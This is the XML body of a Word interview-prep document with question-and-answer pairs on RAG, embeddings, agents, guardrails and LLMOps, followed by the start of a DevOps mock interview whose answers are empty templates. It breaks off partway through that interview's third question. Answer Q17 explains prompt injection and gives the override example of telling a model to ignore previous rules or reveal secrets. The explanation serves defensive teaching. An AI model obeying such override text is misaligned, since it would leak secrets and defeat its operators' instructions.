        <w:t>A: RAG means Retrieval-Augmented Generation. It combines information retrieval with LLM generation. Instead of asking the model to answer only from memory, the application retrieves relevant documents, runbooks, tickets, code snippets, or knowledge-base content and passes that context to the model. We use RAG to make answers more grounded, current, domain-specific, and explainable. For enterprise use, RAG is often safer and cheaper than fine-tuning for knowledge-heavy question answering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Explain the end-to-end flow of a RAG application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A RAG flow has two main paths: ingestion and query. During ingestion, documents are collected, cleaned, chunked, converted into embeddings, and stored in a vector database with metadata. During query, the user question is embedded, relevant chunks are retrieved, optionally reranked, and passed to the LLM with instructions. The LLM generates an answer using the retrieved context. In production, I also add access control, citation links, evaluation, cache, logging, tracing, and feedback capture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What are embeddings and why are they useful in GenAI systems?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Embeddings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Embeddings are numeric vector representations of text, code, images, or other content. Similar meanings are placed closer together in vector space. In GenAI systems, embeddings help with semantic search, document retrieval, duplicate detection, clustering, recommendations, and RAG. For example, a user may ask a Kubernetes troubleshooting question in different words, and embeddings can still retrieve the relevant runbook even if exact keywords do not match.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is a vector database and when would you use one?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Vector DB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A vector database stores embeddings and supports similarity search. I would use one when I need semantic retrieval over documents, runbooks, tickets, product docs, source code, or knowledge bases. Examples include Pinecone, Weaviate, Milvus, Chroma, pgvector, Vertex AI Vector Search, and OpenSearch vector search. In production, I care about metadata filtering, access control, indexing strategy, update pipeline, latency, cost, backup, and observability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you improve retrieval quality in a RAG system?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would improve retrieval by cleaning source documents, choosing good chunk sizes, preserving metadata, using hybrid search with keyword plus vector search, adding reranking, filtering by tenant or document type, and testing different embedding models. I would also evaluate retrieval separately from generation using golden question-answer sets. Poor RAG answers often come from poor retrieval, stale documents, missing metadata, or chunks that are too small or too large.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What is prompt engineering and what makes a prompt production-ready?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Prompt Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Prompt engineering is designing instructions and context so the model responds in the desired format and behavior. A production-ready prompt is version-controlled, tested, measurable, and constrained. It should define role, task, input format, output format, refusal behavior, citation requirements, and safety rules. I would avoid hidden tribal prompts living only in code. Prompts should go through review, evaluation, rollback, and monitoring like application logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you choose between OpenAI, Gemini, Claude, open-source LLMs, or self-hosted models?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Model Selection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would choose based on use case, quality, latency, cost, data privacy, compliance, region availability, context length, tool-calling support, multimodal needs, operational complexity, and vendor risk. Managed APIs are faster to adopt and usually stronger for quality, while open-source or self-hosted models can help with data control, customization, or cost at scale. For production, I would run evaluations against real tasks before deciding, rather than choosing by popularity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. What is the difference between RAG and fine-tuning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Fine Tuning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: RAG provides external knowledge at query time by retrieving relevant context. Fine-tuning changes model behavior or style by training on examples. RAG is better when the knowledge changes often, such as policies, runbooks, product docs, or tickets. Fine-tuning is better when the model needs to follow a specific format, tone, classification behavior, or domain pattern. Many production systems use RAG first, and only fine-tune when evaluation shows a clear need.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. What are AI agents and what risks do they introduce in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Agents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: AI agents use an LLM to plan steps, call tools, inspect results, and continue until a goal is completed. They can be useful for support workflows, code assistance, or operational investigation, but they introduce risks because the model may choose wrong tools, repeat actions, leak data, or perform unsafe changes. In production, agent tools must be permission-scoped, audited, rate-limited, human-approved for risky operations, and protected with strong guardrails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How does tool calling or function calling work in GenAI applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Tool calling allows the model to request a structured function call instead of only generating text. For example, the model can call get_incident_details, search_runbooks, create_ticket, or query_kubernetes_events with typed arguments. The application executes the function and returns results to the model. This pattern is powerful because it connects LLMs to real systems, but it requires validation, authorization, audit logs, timeouts, and safe tool design.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How would you evaluate the quality of an LLM application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Evaluation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would evaluate it at multiple levels: retrieval quality, answer correctness, groundedness, completeness, safety, latency, cost, and user satisfaction. I would build a golden dataset of real user questions and expected answers, run regression tests on prompt or model changes, and use human review for critical workflows. Automated metrics can help, but for enterprise GenAI, human evaluation and task-specific acceptance criteria are very important.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. What is hallucination in LLMs and how would you reduce it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Hallucination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Hallucination means the model generates an answer that sounds confident but is incorrect or unsupported. I would reduce it by using RAG, requiring citations, instructing the model to say when information is missing, limiting the answer to retrieved context, improving retrieval quality, using lower temperature for factual tasks, and evaluating against known answers. For high-risk workflows, I would keep human approval and avoid letting the model take direct action without verification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. What safety and guardrail controls would you add to a GenAI application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Safety</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would add input filtering, output filtering, prompt injection detection, sensitive-data redaction, policy checks, role-based access, tenant isolation, citation requirements, refusal rules, audit logs, human approval for risky actions, and monitoring for unsafe or low-confidence outputs. Guardrails should not be only prompt text. They should also exist in application code, gateway controls, retrieval filtering, and tool permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. What are prompt injection and data leakage risks in GenAI applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Prompt injection happens when a user or document tries to override the system instructions, for example telling the model to ignore previous rules or reveal secrets. Data leakage happens when sensitive information is included in prompts, retrieved context, logs, outputs, or third-party model calls without proper controls. I reduce these risks with retrieval access control, secret redaction, instruction hierarchy, output checks, tool permission boundaries, and careful logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. How would you protect sensitive data when using LLM APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Privacy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would classify data before sending it to an LLM, avoid sending secrets or unnecessary PII, redact sensitive fields, use approved providers and regions, review data retention policies, encrypt data in transit and at rest, and apply access controls. For enterprise systems, I would add audit logs, tenant isolation, DLP checks, and legal/compliance approval. For highly sensitive workloads, I may use a private model endpoint or self-hosted model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. How would you design a production architecture for a GenAI chatbot using RAG?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps/Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would use a frontend or chat API, backend orchestration service, identity provider, document ingestion pipeline, embedding service, vector database, metadata store, LLM provider, cache, and observability stack. The ingestion pipeline would chunk and embed approved documents with metadata and access rules. At query time, the backend authenticates the user, retrieves only authorized context, reranks results, calls the LLM, returns citations, and logs metrics. Production controls include rate limits, safety filters, cost budgets, fallback behavior, and evaluation pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. How would you design CI/CD for prompts, chains, and GenAI application code?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps/CI-CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would version prompts, retrieval configuration, chain logic, and application code together. CI should run unit tests, prompt regression tests, golden dataset evaluations, security checks, and cost/latency checks where possible. Deployment should promote changes through environments, compare quality scores, support rollback, and record which prompt/model/index version produced each answer. Prompt changes can break behavior just like code changes, so they need review and release discipline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. What should you monitor in a production LLM application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps/Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would monitor request volume, latency, token usage, cost, error rate, provider failures, retrieval hit rate, retrieval latency, answer quality feedback, hallucination reports, safety filter triggers, prompt version, model version, cache hit rate, and user satisfaction. For RAG, I also monitor ingestion freshness and vector index health. Logs and traces should include request ID, user or tenant where safe, model, prompt version, retrieved document IDs, and latency breakdown.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. How would you control cost for a high-traffic GenAI application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps/Cost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would control cost through model selection, prompt size reduction, context trimming, caching, batching where applicable, rate limits, token budgets, user quotas, cheaper models for simple tasks, and routing complex requests to stronger models only when needed. For RAG, I would retrieve fewer but better chunks. I would monitor cost per request, cost by tenant, cost by feature, and alert on anomalies. Cost control should be designed from day one because LLM traffic can become expensive quickly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. How would you reduce latency in an LLM-powered API?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps/Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would measure where time is spent: retrieval, reranking, model response, network, or post-processing. Improvements include caching common answers, reducing prompt size, using faster models, streaming responses, optimizing vector search, limiting retrieved chunks, avoiding unnecessary tool calls, colocating services where possible, and using async processing for long workflows. For user experience, streaming partial responses often helps even when total completion time is similar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. How would you design fallback and resilience for LLM provider failures?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would set timeouts, retries with backoff, circuit breakers, fallback models or providers, cached responses for common queries, graceful degradation, and clear user messaging. For critical workflows, I would avoid a single provider dependency. I would monitor provider error rates and latency, and have runbooks for failover. The fallback does not always need equal quality; it needs to keep the product usable and safe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. How would you deploy a GenAI application on Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would deploy the GenAI backend as a containerized service with Kubernetes Deployment, Service, Ingress or gateway, ConfigMaps, Secrets, probes, resource limits, HPA, and network policies. If using external model APIs, the app mainly needs secure egress, secrets, and observability. If hosting models, I would design GPU node pools, model server deployment, autoscaling, storage, warmup, and cost controls. I would also run vector database and ingestion jobs with backups and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. How is LLMOps different from traditional MLOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps/MLOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Traditional MLOps focuses on training, validating, deploying, and monitoring predictive models. LLMOps adds prompt management, retrieval pipelines, vector indexes, model provider routing, token and cost monitoring, hallucination evaluation, safety filters, conversation logs, and tool-calling governance. In LLMOps, behavior can change due to prompts, model versions, retrieval content, embeddings, and provider updates, so traceability is very important.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. A RAG chatbot is giving wrong answers from old documents. How would you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would check whether the old documents are still in the source repository, ingestion pipeline, vector database, or cache. Then I would inspect document metadata, timestamps, chunk IDs, embedding/index refresh status, retrieval results for the failing question, reranking behavior, and prompt instructions. I would also check whether access filters are excluding newer documents. The fix may involve deleting stale vectors, rebuilding the index, improving metadata filters, changing chunking, or adding freshness ranking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. Design a secure internal GenAI assistant for DevOps teams to query runbooks, incidents, and Kubernetes troubleshooting steps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would design it as an authenticated internal assistant backed by RAG over approved runbooks, incident postmortems, Kubernetes docs, and platform standards. Users authenticate through the company identity provider, and retrieval filters enforce team and environment access. The backend retrieves relevant documents, includes citations, and refuses unsupported answers. For troubleshooting, tool calls can query read-only Kubernetes or monitoring APIs with strict permissions. I would add audit logs, prompt injection protection, DLP checks, feedback collection, evaluation datasets, dashboards for quality and cost, and human approval before any write or remediation action.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 77 - Senior DevOps, GCP, Kubernetes and Terraform Production Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Explain your Jenkins pipeline architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/Jenkins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your Jenkins pipeline architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What stages do you include in your CI/CD pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/Jenkins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stages do you include in your CI/CD pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you integrate third-party tools like Prisma Cloud, Stream Security, or Datadog into Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
